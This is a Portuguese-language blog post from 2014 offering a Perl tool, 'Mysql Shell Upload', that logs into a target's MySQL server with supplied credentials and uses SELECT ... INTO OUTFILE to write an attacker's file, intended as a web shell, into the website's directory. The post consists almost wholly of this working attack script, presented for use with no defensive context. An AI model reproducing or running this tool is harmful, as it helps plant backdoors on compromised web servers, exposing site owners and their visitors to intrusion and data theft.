sábado, 11 de janeiro de 2014

[Perl] Mysql Shell Upload

Script para upar shell no site quando se tem acesso ao Mysql
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # 
# Mysql Shell upload                    #
# Coded by MMxM                         #
# [http://hc0der.blogspot.com]   #
# # # # # # # # # # # # # # # # # # # # #

use strict;
use warnings;
use DBI;
use DBD::mysql;
use IO::File;
use Term::ANSIColor qw(:constants);

sub main(){
print BOLD BLUE,"\n[*]",RESET," Mysql shell upload by MMxM";
print BOLD BLUE,"\n[*]",RESET," [htt://hc0der.blogspot.com] \n\n";
print BOLD BLUE,"[*]",RESET," Host: ";
chomp(my $host = <stdin>);
print BOLD BLUE,"[*]",RESET," User: ";
chomp(my $user = <stdin>);
print BOLD BLUE,"[*]",RESET," Password: ";
chomp(my $pass = <stdin>);
print BOLD BLUE,"[*]",RESET," Arquivo de texto que sera upado: ";
chomp(my $arq = <stdin>);
print BOLD BLUE,"[*]",RESET," Path do site+Nome final do arquivo:  ";
chomp(my $path = <stdin>);

my $dsn = "dbi:mysql::$host:3306";
my $dbh = DBI->connect($dsn, $user, $pass,{ 
 PrintError => 0, 
 RaiseError => 0
});
if(!$dbh) { die(BOLD RED,"\n[-]",RESET," Erro ao conectar\n\n"); }

my $f = new IO::File;
$f->open("<$arq") or die $!;
my @file = <$f>;
chomp(@file);
my $text = join('',@file);
chomp($text);
&AddSlashes($text);
$f->close;

my $sth = $dbh->prepare('SELECT "' . $text . '" INTO OUTFILE "'.$path.'"');
if(!$sth->execute()){
print BOLD RED "\n[-]",RESET," Erro ao criar o arquivo\n\n";
exit;
} else {
print GREEN "\n[+]",RESET," Arquivo criado com sucesso\n\n";
exit;
}
}

sub AddSlashes() 
{
    my $text = shift;
    $text =~ s/\\/\\\\/g;
    $text =~ s/'/\\'/g;
    $text =~ s/"/\\"/g;
    $text =~ s/\\0/\\\\0/g;
    return $text;
}

&main();

Nenhum comentário:

Postar um comentário